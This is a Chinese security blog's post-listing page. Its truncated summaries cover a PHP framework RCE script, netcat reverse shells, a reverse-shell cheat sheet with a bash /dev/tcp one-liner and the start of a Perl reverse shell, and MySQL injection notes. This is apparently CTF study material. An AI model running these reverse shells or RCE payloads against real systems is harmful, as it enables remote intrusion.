摘要:
RCE版本范围 : 5.0.1~22```pythonimport requests,timeargs=""data={}# debug=false时无RCE,debug=true时5.0.21~22# data={"_method":"__construct","filter":"system", 阅读全文
posted @ 2022-04-25 12:10
h0cksr
阅读(198)
评论(0)
推荐(0)
摘要:
# 利用netcat反弹shellNetcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。 使用它你可以轻易的建立任何连接。目前,默认的各个linux发行版本已经自带了netcat工具包,但是可能由于 阅读全文
posted @ 2022-04-25 12:09
h0cksr
阅读(422)
评论(0)
推荐(0)
摘要:
JavaScript对象# Documetn<br />Document<br /><br />Document 接口表示任何在浏览器中载入的网页,并作为网页内容的入口,也就是DOM 树。DOM 树包含了像 <body> 、<table> 这样的元素,以及大量其他元素。它向网 阅读全文
posted @ 2022-04-25 12:09
h0cksr
阅读(43)
评论(0)
推荐(0)
摘要:
@propertypyton内置的@property装饰器可以把一个方法变成一个属性python<br />class User:<br /> def __init__(self):<br />   阅读全文
posted @ 2022-04-25 12:08
h0cksr
阅读(42)
评论(0)
推荐(0)
摘要:
Bash 与linux发行版本有关<br />bash -i >& /dev/tcp/10.0.0.1/8080 0>&1<br />## PERL<br />perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_IN 阅读全文
posted @ 2022-04-25 12:08
h0cksr
阅读(183)
评论(0)
推荐(0)
摘要:
create_function()函数官方文档介绍示例代码:php<br /><?php<br />$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');<br />echo "Ne 阅读全文
posted @ 2022-04-25 12:07
h0cksr
阅读(86)
评论(0)
推荐(0)
摘要:
什么是软链接?<br /> 软连接是linux中一个常用命令,<br /> 它的功能是为某一个文件在另外一个位置建立一个同步的链接。<br /> 软连接类似与c语言中的指针,传递的是文件的地址;<br /> 更形象一些,软连接类似于WINDOWS系统中 阅读全文
posted @ 2022-04-25 12:06
h0cksr
阅读(1479)
评论(0)
推荐(0)
摘要:
是从深育杯一道mysql注入知道的使用示例 详细讲解<!--more--> 使用条件: 可以使用堆叠注入或slow_query_log开启(默认是关闭的) slow_query_log为慢查询记录开关 slow_query_log_file是查询语句的记录文件地址 以上参数参数可以通过set语句直接 阅读全文
posted @ 2022-04-25 12:03
h0cksr
阅读(367)
评论(0)
推荐(0)
摘要:
一个很久之前学习mysql注入的笔记#### (1)增删改查语句1. Insert : insert into mrkaixin values( ' 1’ , ' nepnep');2. Delete : delete from mrkaixin where xXXX;3. Update : upd 阅读全文
posted @ 2022-04-25 12:03
h0cksr
阅读(1462)
评论(0)
推荐(0)
浙公网安备 33010602011771号